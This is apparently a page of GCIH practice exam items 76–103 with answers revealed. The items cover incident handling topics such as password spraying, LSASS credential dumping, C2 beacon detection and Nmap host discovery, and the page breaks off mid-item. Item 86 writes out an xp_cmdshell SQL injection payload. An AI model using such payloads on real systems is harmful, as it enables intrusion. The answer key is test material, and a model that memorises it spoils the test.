Courseiva

GIAC Certified Incident Handler (GCIH) — Questions 76–150

322 questions total · 5pages · All types, answers revealed

Page 1

Page 2 of 5

Page 3
76
MCQmedium

An incident handler is reviewing WAF logs and notices repeated HTTP requests to a web application where the 'Host' header contains an attacker-controlled domain, while the request line targets the legitimate application server. The application uses the Host header to construct password-reset links emailed to users. Which web application injection attack class BEST describes this activity?

A.HTTP response splitting through CRLF injection in the Host header
B.Cross-Site Request Forgery (CSRF) against the password reset endpoint
C.Server-Side Request Forgery (SSRF) via the password reset functionality
D.HTTP Host header injection leading to password reset poisoning
AnswerD

The attacker manipulates the Host header so the application embeds the attacker's domain into the password-reset URL. When a victim clicks the link, the reset token is sent to the attacker-controlled server. This matches the observed traffic and the application's behavior of using the Host header for link generation.

Why this answer

The attacker exploits the application's trust in the Host header to generate password-reset links. By setting the Host header to an attacker-controlled domain, the reset email contains a link pointing to that domain, allowing token theft. This is a classic Host header injection attack, distinct from CSRF, SSRF, and response splitting.

Exam trap

The trap here is assuming that any manipulation of the Host header automatically indicates SSRF or CSRF, when in fact the specific impact depends on how the application uses that header.

77
MCQhard

Which TWO methods are effective for mitigating Mass Assignment vulnerabilities in RESTful APIs?

A.Implement strict input allow-lists for model binding
B.Use Data Transfer Objects (DTOs) for input mapping
C.Always sanitize input for SQL injection patterns
D.Increase the complexity of the API authentication token
E.Disable all write operations on public API endpoints
AnswerA, B

Defining an explicit allow-list of fields that the API is permitted to bind ensures that unexpected or sensitive fields provided by the client are ignored. This technique creates a secure boundary between external input and internal object properties, effectively neutralizing Mass Assignment risks.

Why this answer

Mass Assignment occurs when an API endpoint automatically binds client-provided input to internal data models or database fields without explicit filtering. By using Data Transfer Objects (DTOs) or explicit allow-lists, developers ensure only intended fields are updated. This prevents attackers from overwriting sensitive fields like 'is_admin' or 'account_balance' that should not be exposed to user modification during standard API update operations.

Exam trap

Students often mistakenly select output encoding or parameterized queries, confusing Mass Assignment (an input binding issue during writes) with SQL injection or Cross-Site Scripting vulnerabilities.

78
MCQhard

A penetration tester is attempting to crack NTLM hashes captured from a Windows environment. The hashes were obtained from a memory dump of a workstation. The tester decides to use Hashcat with the mode 1000. Which of the following best describes the type of hashes being cracked and the primary reason this mode is chosen?

A.Kerberos 5 TGS-REP hashes, because mode 1000 extracts service account credentials from ticket-granting tickets.
B.NetNTLMv2 hashes, because mode 1000 captures challenge-response pairs for network authentication.
C.LM hashes, because mode 1000 is designed to crack the older LAN Manager hash format.
D.NTLM hashes, because mode 1000 is optimized for fast brute-force attacks against unsalted MD4-based hashes.
AnswerD

Hashcat mode 1000 specifically targets NTLM hashes, which are unsalted MD4 hashes of the user's password. These are fast to compute, allowing high-speed brute-force and rule-based attacks. The lack of salting means identical passwords produce identical hashes, enabling precomputed attacks and efficient cracking, which is why this mode is chosen.

Why this answer

Hashcat mode 1000 is designated for NTLM hashes, which are MD4-based and unsalted. This makes them vulnerable to rapid brute-force and dictionary attacks. The other options misidentify the hash types and their corresponding Hashcat modes.

Therefore, the correct answer is the one that correctly pairs NTLM with mode 1000 and explains the speed advantage.

Exam trap

The trap here is assuming that mode 1000 handles NetNTLMv2 or Kerberos hashes, but each hash type has a distinct mode in Hashcat.

79
MCQmedium

A red team operator is building an LLM-assisted phishing campaign tool that generates personalized pretexts for targets. The tool queries an external LLM API with target names and job titles scraped from LinkedIn. A security architect warns that this workflow may expose sensitive engagement data and violate client scoping agreements. Which control best mitigates this risk while preserving the tool's functionality?

A.Rotate the API keys used for the external LLM service every 24 hours during the engagement.
B.Add a system prompt instructing the external LLM to forget all data after each response and never store it.
C.Base64-encode the target names and titles before sending them to the external API to obscure the data in transit.
D.Deploy a locally hosted open-weight LLM within the engagement infrastructure and route all prompts to it instead of the external API.
AnswerD

Hosting an open-weight model locally keeps target PII and engagement details inside the controlled environment, eliminating third-party data exposure and contractual scoping violations. It still produces the personalized pretexts the tool needs. This is the correct mitigation because it addresses the root cause, data leaving the perimeter, rather than trying to detect or negotiate around the leak after it happens.

Why this answer

The core risk is that target PII and engagement specifics leave the trusted environment when prompts are sent to a third-party API. A locally hosted open-weight model keeps all inference and data inside the engagement infrastructure, removing the third-party exposure entirely while still generating the required pretexts. Encoding, prompt instructions, and key rotation do not prevent the data itself from reaching the vendor, so they fail to address the actual scoping and confidentiality issue.

Exam trap

The trap here is assuming that encoding prompts or instructing the model to forget data constitutes a real data-protection control when the content still reaches the third party in decodable form.

80
MCQmedium

An incident responder is investigating a modern web application and notices that users can modify object identifiers in REST API endpoints to access sensitive records belonging to other tenants. Which primary vulnerability category does this represent?

A.Cross-Site Request Forgery
B.Broken Object Level Authorization
C.Server-Side Request Forgery
D.Mass Assignment Vulnerability
AnswerB

Modifying object identifiers to reach other tenants' records is Broken Object Level Authorization: the API authenticates the caller but never verifies that the caller owns the requested object. Authorization is enforced per object, not per endpoint, which is exactly the flaw described.

Why this answer

Broken Object Level Authorization occurs when an application fails to properly verify user permissions before granting access to objects based on the provided identifier. Attackers manipulate the ID parameter to view or modify unauthorized data, making this a critical Web App API security flaw requiring strict role-based checks.

Exam trap

Candidates frequently confuse BOLA with Broken Object Property Level Authorization or traditional IDOR, failing to recognize that API-specific context emphasizes programmatic identifier enumeration.

81
MCQmedium

A GCIH incident handler is reviewing web server logs after a suspected API reconnaissance campaign. The logs show numerous requests to endpoints such as /api/v1/users, /api/v2/users, /api/v3/users, and /api/internal/users, all returning HTTP 404 except one. Which attack technique is most consistent with this pattern?

A.Cross-site scripting (XSS) in API responses
B.API version enumeration
C.Server-side request forgery (SSRF) via API parameters
D.JWT algorithm confusion attack
AnswerB

The attacker systematically probes multiple API version prefixes and internal paths to discover which versions are live and may lack security controls. The single successful response reveals a valid version, making version enumeration the technique in use. This is a common precursor to exploiting deprecated or unpatched API versions.

Why this answer

The pattern of requests to multiple API version prefixes and internal-looking paths, with only one returning a non-404 response, indicates deliberate version and endpoint enumeration. Attackers use this to map the API surface and find versions that may be deprecated, unpatched, or less protected, which then become targets for further exploitation.

Exam trap

The trap here is assuming that repeated 404 responses indicate a failed attack, when in fact they are the expected outcome of enumeration that successfully identifies a valid API version.

82
MCQmedium

Which Nmap scan type should be used when the goal is to map the topology of a network and identify active hosts without establishing any TCP or UDP connections?

A.TCP SYN scan (-sS)
B.TCP Connect scan (-sT)
C.ICMP Echo Request (-sn)
D.UDP scan (-sU)
AnswerC

The -sn flag performs a ping sweep using ICMP echo requests. This is the standard method for host discovery that bypasses the transport layer, effectively mapping active nodes without ever attempting a TCP or UDP connection. It is the most lightweight method for creating a rapid, low-impact inventory of live hosts.

Why this answer

ICMP-based discovery, such as a ping sweep, identifies hosts by simply checking for responses to 'echo requests'. Because this avoids the transport layer (TCP/UDP) entirely, it is a low-impact and highly efficient way to map network topology. This is vital when the responder must map a large environment quickly without generating connection-based logs on the target systems or intermediary security devices.

Exam trap

Candidates select TCP SYN or Connect scans thinking they are stealthy, forgetting that these establish transport layer handshakes rather than purely discovering hosts.

83
Multi-Selectmedium

A GCIH incident handler is investigating a suspected compromise on a Windows 10 workstation. The user reported unusual outbound network connections and sluggish performance. To determine the scope and impact of the incident, the handler must collect volatile evidence first. Which TWO artifacts should the handler prioritize to capture active network connections and running processes before memory is altered or lost? (Choose two.)

Select 2 answers
A.List of scheduled tasks from the Task Scheduler library
B.Contents of the Windows Security event log
C.Contents of the `C:\Windows\Prefetch` directory
D.Output of the `netstat -anob` command
E.Output of the `tasklist /v` command
AnswersD, E

The `netstat -anob` command displays all active network connections, listening ports, and the associated executable names (with the -b switch) and process IDs (with the -o switch). This provides an immediate snapshot of which processes are communicating over the network, directly addressing the need to capture active connections and running processes. It is a core volatile data collection step in incident response.

Why this answer

In incident response, volatile data such as active network connections and running processes must be collected first because they are lost when the system is shut down or memory is altered. The `netstat -anob` command provides a snapshot of network connections and associated processes, while `tasklist /v` lists running processes with details. Together, they offer a current view of system activity, enabling the handler to identify malicious processes and their network communications.

Exam trap

The trap here is confusing non-volatile artifacts like event logs or scheduled tasks with volatile data that must be captured immediately.

84
MCQmedium

Which security measure is most effective against API-based Denial of Service (DoS) attacks targeted at resource-intensive endpoints?

A.Enforcing HTTPS for all traffic
B.Implementing robust rate limiting
C.Using JWTs for authentication
D.Disabling CORS headers
AnswerB

Rate limiting restricts the frequency of requests from a specific source, preventing attackers from overloading the API with resource-intensive requests. This ensures that system resources are distributed fairly and prevents any single source from exhausting the server's capacity, which is the primary goal of API DoS prevention.

Why this answer

Rate limiting is the standard defense against resource exhaustion in APIs. By enforcing limits on the number of requests a client can make within a specific timeframe, the API prevents a single user or bot from monopolizing backend CPU, memory, or database connections. This ensures that the service remains available to other legitimate users, mitigating the risk of intentional or accidental system degradation caused by heavy API consumption patterns.

Exam trap

Candidates frequently choose 'Web Application Firewalls' (WAF). While WAFs assist, rate limiting is the specific, most effective architectural control for preventing resource exhaustion at the API endpoint level itself.

85
MCQmedium

Refer to the exhibit. An analyst observes this command output on a compromised server. What is the most likely intent of the attacker?

A.Listing available files for exfiltration.
B.Preparing for ransomware deployment by removing backups.
C.Escalating privileges to the SYSTEM account.
D.Cleaning up evidence of previous tool execution.
AnswerB

The deletion of volume shadow copies is a standard step for ransomware operators to prevent victims from restoring files without paying the ransom. By identifying this command early, an analyst can potentially stop the encryption process before the damage is done, demonstrating the effectiveness of proactive log monitoring.

Why this answer

Attackers use `vssadmin` to delete shadow copies, effectively disabling the system's ability to recover files after encryption by ransomware. Detecting this command is a high-fidelity signal of an active ransomware attack or a data destruction event. Incident responders must act immediately upon seeing this, as it indicates the adversary is cleaning up recovery options before deploying their final payload or after exfiltration is complete.

Exam trap

Candidates often mistake this for simple system maintenance or administrative backup rotation, failing to recognize that deleting shadow copies is a hallmark of ransomware preparation intended to prevent recovery.

86
MCQhard

During incident response at a financial firm, an analyst discovers that a web application's login form is vulnerable to SQL injection. The backend is Microsoft SQL Server, and the application account has sysadmin rights. The attacker's payloads include ; EXEC xp_cmdshell 'whoami' -- and responses show the web server's service account name. Which immediate containment action best limits further damage while preserving evidence?

A.Immediately shut down the database server and restore it from the most recent backup.
B.Enable full SQL query logging and wait for the next attack to gather more indicators before taking action.
C.Block the attacker's source IP address at the perimeter firewall and continue monitoring.
D.Disable the xp_cmdshell extended stored procedure and revoke sysadmin from the application's database login, after capturing relevant logs and database state.
AnswerD

Removing sysadmin rights and disabling xp_cmdshell directly stops the observed command-execution path while preserving logs and database state for forensics. This containment is surgical: it addresses the exploited capability without destroying evidence. Capturing logs and state first ensures the analyst retains indicators such as the injected queries and any files created by whoami or subsequent commands.

Why this answer

The attacker leveraged sysadmin rights to run xp_cmdshell, achieving OS command execution through SQL injection. The most effective containment is to remove that capability by disabling xp_cmdshell and revoking sysadmin from the application login, while first preserving logs and database state. This stops the specific attack path without destroying evidence, unlike a full shutdown or restore.

Exam trap

The trap here is treating a full server shutdown as containment, when it actually destroys volatile evidence and does not address the root capability.

87
MCQmedium

During an incident response engagement at a financial firm, you are reviewing authentication logs on a Windows Server 2019 domain controller. You notice a series of failed logon attempts with Event ID 4625, all originating from a single source IP, using a list of 500 common usernames but only one password attempt per username. The attempts occur over a period of 30 minutes. Which type of password attack is most likely being executed?

A.Brute-force attack
B.Password spraying
C.Credential stuffing
D.Rainbow table attack
AnswerB

Password spraying uses a small number of common passwords against many accounts to avoid lockout thresholds. Here, 500 usernames with a single password attempt each matches this pattern perfectly. It is a low-and-slow approach that evades account lockout policies, making it the most likely attack based on the log evidence.

Why this answer

The pattern of many usernames with a single password attempt each is characteristic of password spraying. This technique avoids lockout by keeping failed attempts per account low while testing a common password across many accounts. Credential stuffing uses breached pairs, brute-force targets one account, and rainbow tables are offline.

Thus, password spraying is the correct identification.

Exam trap

The trap here is confusing password spraying with brute-force, but spraying uses one password against many accounts, while brute-force uses many passwords against one account.

88
MCQhard

An incident responder is analyzing a compromised AWS EC2 instance that was used to exfiltrate data from an S3 bucket. The attacker gained access by exploiting a server-side request forgery (SSRF) vulnerability in a web application running on the instance. The instance had an IAM role attached that allowed s3:GetObject on a sensitive bucket. Which of the following logs would provide the MOST direct evidence of the S3 data access by the attacker?

A.Amazon S3 server access logs.
B.AWS CloudTrail management events for the S3 service.
C.AWS CloudTrail data events for the S3 bucket.
D.VPC Flow Logs for the EC2 instance's network interface.
AnswerC

CloudTrail data events capture object-level API activity for S3, such as GetObject, PutObject, and DeleteObject. Since the attacker used the instance's IAM role to call s3:GetObject, these events will record the API call, including the identity (the role), the source IP, and the object accessed. This provides direct evidence of the exfiltration. Management events would not capture the object-level access, so data events are essential.

Why this answer

CloudTrail data events for S3 capture object-level API calls, including the identity of the caller (the IAM role) and the specific objects accessed. This directly evidences the exfiltration. Management events do not include data plane operations, S3 server access logs are less integrated, and VPC Flow Logs lack application-layer detail.

Thus, CloudTrail data events are the most direct source.

Exam trap

The trap here is confusing CloudTrail management events with data events, or assuming that VPC Flow Logs can show application-level S3 access, when only data events capture object-level operations.

89
MCQhard

During an incident response, you identify that an attacker is using an SMB relay attack to gain domain-level access. Which mitigation strategy effectively prevents this by forcing authentication through a secure, encrypted channel?

A.Enable SMBv1 protocol support
B.Enable SMB message signing
C.Disable the Windows Firewall
D.Enable guest access on all SMB shares
AnswerB

Enforcing SMB signing requires every packet to be digitally signed. Since an attacker acting as a man-in-the-middle does not possess the session keys required to sign the packets, the server rejects the relayed traffic. This effectively breaks the relay chain and prevents the attacker from escalating their access level.

Why this answer

SMB signing is the primary defense against relay attacks. By enforcing SMB signing, the server refuses any connection that does not have a valid cryptographic signature, which prevents attackers from relaying captured authentication tokens. Without this signature, the relay attack fails because the attacker cannot forge the necessary cryptographic proof of identity.

This is a fundamental security requirement for all modern domain-joined environments to maintain integrity and thwart lateral movement.

Exam trap

Candidates often suggest disabling SMB v1 or using MFA, which are good security practices but do not specifically address the mechanism of relaying authentication tokens like SMB signing does.

90
MCQmedium

A GCIH incident handler is investigating a Windows 10 workstation compromised by an attacker who briefly gained local administrator access. The attacker ran a utility that extracted credential material while the machine was running, then left. The handler finds no suspicious files in the System32 directory, and the SAM and SYSTEM hives appear unmodified. However, the handler notices that the LSASS process was accessed by a process that is no longer running. Which of the following best describes what the attacker most likely obtained?

A.Plaintext credentials or password hashes cached in memory by the Local Security Authority Subsystem Service (LSASS).
B.The Active Directory database (NTDS.dit) from the domain controller.
C.The NTLM password hashes stored in the SAM database.
D.The DPAPI master keys used to encrypt saved browser passwords.
AnswerA

The Local Security Authority Subsystem Service (LSASS) caches credential material in memory, including plaintext passwords (if wdigest authentication is enabled), NTLM hashes, and Kerberos tickets. An attacker with local administrator rights can access LSASS and extract these credentials using tools like Mimikatz. Since the SAM hive was unmodified and no files were left on disk, the most likely target was LSASS in memory, making this the correct answer.

Why this answer

Accessing LSASS in memory allows an attacker to extract credential material that is not stored on disk, such as plaintext passwords (if wdigest is enabled), NTLM hashes, and Kerberos tickets. Because the SAM and SYSTEM hives were unmodified and no files were left behind, the attacker likely used a memory-based credential dumping technique targeting LSASS. This is a common post-exploitation step for privilege escalation and lateral movement.

Exam trap

The trap here is assuming that credential theft always involves copying the SAM database, when in fact LSASS memory often holds more valuable and volatile credentials.

91
MCQmedium

An incident responder investigating a compromised Windows workstation discovers that an attacker established persistent command and control using a malicious DLL. The DLL was placed in a system directory and loaded by a legitimate, signed Microsoft binary through DLL search order hijacking. Which response action effectively remediates the persistence while preserving the legitimate binary and minimizing host downtime?

A.Reimage the compromised workstation immediately to ensure all hidden artifacts and registry hooks are completely removed from the operating system.
B.Delete the legitimate signed Microsoft binary that loaded the malicious payload to prevent any further execution attempts by the operating system.
C.Locate and securely delete the rogue malicious DLL file from the search path while preserving the legitimate signed binary and auditing registry permissions.
D.Modify the Windows Registry to disable the DLL loading subsystem entirely across the domain to prevent all future instances of search order hijacking.
AnswerC

Targeting the specific malicious DLL file neutralizes the persistence mechanism while preserving system stability and legitimate application functionality. Auditing directory and registry permissions ensures the attacker cannot easily drop another replacement payload into the vulnerable path.

Why this answer

Identifying and removing the malicious payload while keeping the legitimate application intact is critical for operational continuity during incident response. DLL search order hijacking exploits how Windows searches for dependent libraries. Replacing or removing the unauthorized payload neutralizes the execution vector without requiring a full OS reinstallation, allowing investigators to focus on lateral movement and containment.

Exam trap

Candidates often select full system re-imagining or terminating the parent process, overlooking targeted remediation steps that preserve business-critical software configurations and reduce organizational downtime during active investigations.

92
MCQeasy

Which of the following describes a 'Password Spraying' attack, and why is it preferred by attackers over traditional brute-force methods against a target domain?

A.Testing thousands of passwords against a single high-privileged account
B.Using one common password against many different accounts
C.Capturing hashes via packet sniffing and offline cracking
D.Injecting malicious code into the authentication form
AnswerB

Password spraying is characterized by the 'low and slow' approach of testing a single password against many accounts. This minimizes failed attempts per account, ensuring that individual user accounts remain active and that the attacker does not trigger account lockout mechanisms during the process.

Why this answer

Password spraying involves testing a single, common password against a large list of accounts rather than testing many passwords against one account. It is preferred because it avoids triggering account lockout thresholds, which are designed to detect traditional brute-force attacks. By keeping the authentication frequency low per account, attackers can stay under the radar of automated security monitoring systems while significantly increasing the likelihood of compromising at least one account.

Exam trap

Candidates frequently confuse password spraying with credential stuffing. They fail to realize that spraying uses one password against many accounts, whereas stuffing uses many credentials against one or more targets.

93
Multi-Selecthard

A threat hunter is reviewing Sysmon logs from a Windows workstation that is suspected of being compromised. The hunter sees a process named 'svchost.exe' with a parent process of 'services.exe', but its image path is 'C:\Users\Public\svchost.exe' and it has an active network connection to an external IP address on port 443. Which two indicators should the hunter flag as highly suspicious in this scenario? (Choose two.)

Select 2 answers
A.The process name is svchost.exe.
B.The process is running under the SYSTEM account.
C.The process has an active network connection on port 443.
D.The parent process is services.exe.
E.The image path is C:\Users\Public\svchost.exe.
AnswersC, E

While svchost.exe can make network connections, an instance running from an unusual path making an external connection on port 443 is highly suspicious. Attackers commonly use HTTPS for command-and-control to blend with normal traffic. Combined with the anomalous path, this network activity strongly suggests malicious behavior and should be flagged.

Why this answer

The two suspicious indicators are the non-standard image path and the external network connection. Legitimate svchost.exe runs from System32, so an instance in C:\Users\Public indicates masquerading. The external connection on port 443 suggests command-and-control or data exfiltration.

Together, they strongly point to a compromised host, while the parent process and process name are normal.

Exam trap

The trap here is assuming that because svchost.exe is a legitimate process and often runs as SYSTEM, any instance is benign; the anomaly is the path and network behavior, not the name or parent.

94
Multi-Selecthard

Which TWO of the following strategies are most effective when using AI tools to assist in the analysis of large-scale, automated malware logs?

Select 2 answers
A.Provide the AI with the full, unfiltered enterprise log database without context.
B.Use the AI to identify outliers in communication patterns compared to historical baselines.
C.Task the AI with summarizing log files based on established MITRE ATT&CK techniques.
D.Rely on the AI to automatically perform incident remediation without verification.
E.Instruct the AI to ignore all non-standard timestamps to simplify the output.
AnswersB, C

AI excels at identifying statistical deviations in large datasets. By comparing current traffic patterns against established historical baselines, the model can highlight unusual connections, such as unexpected beaconing or data exfiltration attempts. This narrows the scope for the responder, allowing them to focus investigative efforts on high-probability malicious events rather than raw logs.

Why this answer

Effective AI-assisted log analysis requires a balance of automation and human verification. By focusing on pattern recognition and outlier detection, investigators can rapidly surface anomalies that manual review would miss. These strategies matter because modern malware generates massive datasets; relying solely on manual inspection is unsustainable, while relying solely on AI without defined parameters leads to alert fatigue and significant false positive rates that obscure the true threat actor's activities.

Exam trap

Candidates often suggest using AI for automated remediation or full-scale log deletion, ignoring that the question specifically asks for analysis strategies that maintain human oversight and focus on identifying patterns.

95
Multi-Selectmedium

An incident responder is analyzing a network capture to identify potential command-and-control (C2) communication. The capture shows a workstation making regular DNS queries to 'update.microsoft.com' every 60 seconds, each followed by a small HTTPS session to a different IP address. The HTTPS sessions use self-signed certificates and the User-Agent string is 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)'. Which TWO of the following indicators most strongly suggest malicious C2 activity? (Choose two.)

Select 2 answers
A.The DNS queries are for a legitimate domain but resolve to multiple IP addresses.
B.The DNS queries occur at regular 60-second intervals.
C.The HTTPS sessions are to different IP addresses each time.
D.The User-Agent string is outdated and inconsistent with the operating system.
E.The HTTPS sessions use self-signed certificates.
AnswersD, E

An outdated User-Agent like 'MSIE 6.0' on a modern system is a red flag. Malware authors often hardcode old User-Agent strings, while legitimate applications use current ones. Inconsistency with the OS further suggests spoofing. This is a common indicator of C2 traffic, as it deviates from normal user behavior.

Why this answer

The correct answers are that the HTTPS sessions use self-signed certificates and the User-Agent string is outdated and inconsistent. Self-signed certificates are a hallmark of malware C2 because they are not trusted and often used to avoid detection. An outdated User-Agent like MSIE 6.0 on a modern system suggests the traffic is generated by malware with hardcoded strings.

Together, these strongly indicate malicious C2 activity, whereas the other options can be benign.

Exam trap

The trap here is focusing on the regular intervals or multiple IPs, which can be legitimate, while ignoring the more definitive indicators like self-signed certificates and outdated User-Agent.

96
MCQhard

An incident responder is analyzing a compromised Windows host and discovers that the attacker used the built-in 'sc.exe' utility to create a new service named 'WinDefendHelper' with a binary path pointing to a file in C:\Users\Public\Documents. The service was set to start automatically and the attacker then deleted the original dropper executable. Which persistence mechanism has the attacker implemented, and what is the most reliable detection artifact?

A.A WMI event subscription was created; detection should focus on the __EventFilter and __EventConsumer classes in the root\subscription namespace.
B.A startup folder shortcut was placed; detection should focus on file creation events in the user's Startup directory.
C.A new Windows service was created; detection should focus on Event ID 7045 in the System log and registry keys under HKLM\SYSTEM\CurrentControlSet\Services.
D.A scheduled task was registered; detection should focus on the TaskCache registry key and Event ID 4698 in the Security log.
AnswerC

Creating a service with sc.exe generates Event ID 7045 in the System event log, recording the service name, image path, and start type. The corresponding registry key under HKLM\SYSTEM\CurrentControlSet\Services persists the configuration. Even if the dropper is deleted, the service entry and its event log record remain, making these the most reliable detection artifacts for this persistence technique.

Why this answer

Using sc.exe to create a new auto-start service is a classic Windows persistence technique. Event ID 7045 in the System log records the service installation with its name, image path, and start type, while the registry key under HKLM\SYSTEM\CurrentControlSet\Services stores the persistent configuration. Together these artifacts survive deletion of the original dropper and provide reliable detection evidence.

Exam trap

The trap here is focusing on the deleted dropper file rather than the persistent service registration, which remains in the registry and event logs even after the executable is removed.

97
MCQmedium

An incident handler is mapping a DMZ segment and needs to determine whether a suspicious host at 172.16.5.22 is reachable before launching a targeted service scan. The host may be protected by a host-based firewall that drops TCP SYN packets, but it is known to run a service on UDP port 123. Which Nmap command should the handler use to most reliably determine if the host is alive?

A.nmap -PU123 172.16.5.22
B.nmap -PE 172.16.5.22
C.nmap -PS22 172.16.5.22
D.nmap -sn 172.16.5.22
AnswerA

The -PU option performs a UDP ping by sending a UDP packet to the specified port. If the host is alive and the port is closed, it will respond with an ICMP port unreachable message; if the port is open, it may respond with a UDP packet or no response, but the lack of an ICMP unreachable can still indicate the host is up. Because the scenario specifies that UDP port 123 is running, this probe is likely to elicit a response, making it the most reliable method to determine if the host is alive despite TCP SYN being dropped.

Why this answer

The handler needs a host discovery method that works despite TCP SYN being dropped. UDP port 123 is known to be running, so a UDP ping to that port (-PU123) is the most likely to elicit a response that confirms the host is alive. ICMP echo and TCP SYN probes may be blocked by the host-based firewall, and the default host discovery mix in -sn may also fail.

Therefore, the UDP ping is the most reliable choice.

Exam trap

The trap here is assuming that a standard ping sweep or TCP SYN probe will always work, ignoring that host-based firewalls often block those specific probes while leaving UDP services reachable.

98
MCQeasy

An incident responder is analyzing a compromised Linux server and discovers that the attacker has added a new user account with a password hash in /etc/shadow. The responder notes that the hash begins with '$6$'. Which of the following best describes the hashing algorithm used for this password?

A.bcrypt
B.SHA-512 crypt
C.MD5 crypt
D.SHA-256 crypt
AnswerB

The '$6$' prefix in /etc/shadow indicates SHA-512 crypt, a widely used password hashing algorithm on Linux. It applies multiple rounds of SHA-512 with a salt to slow down brute-force attacks. Recognizing this prefix helps incident responders understand the strength of the password storage and the potential effort required to crack it.

Why this answer

In /etc/shadow, the '$6$' prefix identifies SHA-512 crypt as the hashing algorithm. This is a strong, salted, and iterated algorithm commonly used on modern Linux systems. The other prefixes correspond to different algorithms: '$1$' for MD5, '$5$' for SHA-256, and '$2a$' for bcrypt.

Correctly identifying the algorithm helps assess password cracking difficulty.

Exam trap

The trap here is confusing the numeric prefixes for SHA-256 and SHA-512 crypt, where '$5$' is SHA-256 and '$6$' is SHA-512.

99
Multi-Selecthard

An incident responder is investigating a suspected credential dumping incident on a Windows Server 2019 host. The attacker is believed to have used a tool that reads the Local Security Authority Subsystem Service (LSASS) process memory. Which two indicators, when observed together, most strongly suggest that LSASS memory was accessed for credential theft? (Choose two.)

Select 2 answers
A.Event ID 1102 indicating the security audit log was cleared
B.Event ID 4656 with handle access rights including 0x1010 or 0x1410 requested against the lsass.exe process object
C.Event ID 5145 showing access to the \\*\IPC$ share from a remote IP address
D.Event ID 4624 logon type 3 from the local host to itself using a machine account
E.Event ID 4688 showing a process created with a command line containing 'lsass' and 'dump' or 'MiniDump'
AnswersB, E

Event ID 4656 with handle rights 0x1010 (PROCESS_QUERY_INFORMATION | PROCESS_VM_READ) or 0x1410 indicates a process opened lsass.exe with the permissions needed to read its memory. This is a strong indicator of credential dumping tools like Mimikatz or ProcDump, which must obtain these specific access rights to extract credentials from LSASS.

Why this answer

The two strongest indicators of LSASS memory access for credential theft are Event ID 4656 showing handle access rights of 0x1010 or 0x1410 against lsass.exe, and Event ID 4688 showing process creation with command-line arguments referencing lsass and dump operations. Together they confirm both the access request and the tool used, providing high-fidelity evidence of credential dumping.

Exam trap

The trap here is treating log clearing or network logon events as primary indicators of credential dumping, when the definitive evidence is the specific handle access rights and process creation command lines targeting LSASS.

100
MCQhard

A GCIH incident handler is investigating a Linux server that an AI-based anomaly detector flagged for unusual outbound traffic. The handler suspects the server is beaconing to a C2 server but the traffic is encrypted and the beacon interval appears randomized. The handler has a packet capture and wants to apply a technique that can identify the beaconing pattern despite the randomization. Which approach should the handler use?

A.Perform frequency analysis on the inter-arrival times of outbound connections to the suspected destination.
B.Decrypt the TLS session using the server's private key and search the payload for known C2 strings.
C.Run a signature-based IDS rule set updated with the latest C2 domain blocklist against the packet capture.
D.Inspect the TLS certificate presented by the suspected C2 server for a self-signed or mismatched common name.
AnswerA

Beaconing, even with randomized intervals, often retains a statistical signature such as a base interval with jitter or a periodic component. Frequency analysis on inter-arrival times can reveal that underlying periodicity, distinguishing C2 traffic from routine user-driven connections. This technique works on encrypted traffic because it analyzes timing metadata rather than payload, directly addressing the randomized beacon interval challenge.

Why this answer

When beacon intervals are randomized, the payload is encrypted, and signatures are unavailable, timing metadata becomes the most reliable signal. Frequency analysis on inter-arrival times can expose an underlying periodic component or a base interval with jitter, which is characteristic of beaconing. Certificate inspection and signature matching depend on known-bad artifacts, and TLS decryption is impractical without keys, so timing analysis is the correct approach.

Exam trap

The trap here is assuming that encrypted C2 cannot be analyzed, when timing metadata like inter-arrival intervals remains visible and is often sufficient to detect beaconing.

101
MCQhard

You are analyzing a packet capture from a compromised host and notice a series of TCP packets with the SYN flag set, sent to sequential ports on multiple internal hosts. The source IP is the compromised host, and the destination ports range from 1 to 1024. The packets are spaced approximately 0.5 seconds apart. Which Nmap scan type is most consistent with this traffic pattern?

A.TCP SYN scan (-sS)
B.UDP scan (-sU)
C.TCP FIN scan (-sF)
D.TCP connect scan (-sT)
AnswerA

A TCP SYN scan sends SYN packets to target ports and analyzes responses. For closed ports, the target replies with RST; for open ports, SYN/ACK. The described traffic of SYN packets to sequential ports on multiple hosts at a moderate rate is characteristic of a SYN scan, often used for stealthy port scanning during reconnaissance.

Why this answer

The traffic pattern of TCP SYN packets sent to sequential ports on multiple hosts is the hallmark of a TCP SYN scan, which is the default and most common Nmap scan type. It is stealthy because it never completes the three-way handshake, reducing the chance of being logged by applications. The other scan types either use different flags (FIN), different protocols (UDP), or complete connections (connect scan), making them inconsistent with the observed SYN-only traffic.

Exam trap

The trap here is confusing a SYN scan with a connect scan; both involve SYN packets, but a connect scan completes the handshake, generating additional ACK packets that are absent in the described capture.

102
MCQmedium

Refer to the exhibit. The log shows a low-confidence alert from an AI tool. How should an incident responder proceed?

A.Follow the suggestion and isolate the host as instructed by the system.
B.Conduct manual investigation of the host and network traffic to verify.
C.Log the event as a false positive and disable the detection rule.
D.Wait for the AI to provide more logs before making a decision.
AnswerB

Manual validation is the only safe way to handle low-confidence AI alerts. By verifying the network traffic patterns and host process logs, the responder can determine if the alert is a genuine threat or a statistical anomaly. This preserves the operational uptime while ensuring that the organization's security posture remains robust and accurate.

Why this answer

With a confidence score of 0.45, the AI is expressing high uncertainty, effectively indicating that the detection is not reliable enough for automated action. The responder must perform a manual investigation—such as checking firewall logs, host artifacts, or process trees—to validate the alert before taking disruptive actions. This ensures that the incident response process remains grounded in high-fidelity evidence rather than reacting to 'noisy' but potentially incorrect AI-generated suggestions.

Exam trap

Candidates often assume that a low-confidence alert can be ignored or automatically dismissed, failing to realize that even 'low' probability threats still require human triage to confirm or rule out malicious activity.

103
MCQmedium

During an incident response engagement, you observe that a compromised Windows workstation periodically sends DNS queries for subdomains of 'sync.update-service.com', such as 'a1b2c3.sync.update-service.com'. The queries occur at irregular intervals, and the responses contain TXT records with long, high-entropy strings. The domain is not associated with any known legitimate service. Which technique is the adversary most likely using?

A.Fast flux DNS to evade blocklists
B.Domain fronting to hide C2 traffic
C.DNS tunneling for command and control
D.DNS cache poisoning to redirect traffic
AnswerC

The use of TXT records with high-entropy data and irregular query timing to a suspicious domain is characteristic of DNS tunneling, where data is encoded in DNS queries and responses to establish a covert channel. The subdomain labels likely carry encoded commands or exfiltrated data, and the TXT responses deliver instructions or acknowledgments.

Why this answer

The adversary is using DNS tunneling to encapsulate command and control data within DNS queries and responses. The high-entropy TXT records and irregular subdomain queries indicate encoded data being sent to and from the attacker's authoritative DNS server. This technique bypasses many network controls because DNS is often allowed outbound.

Exam trap

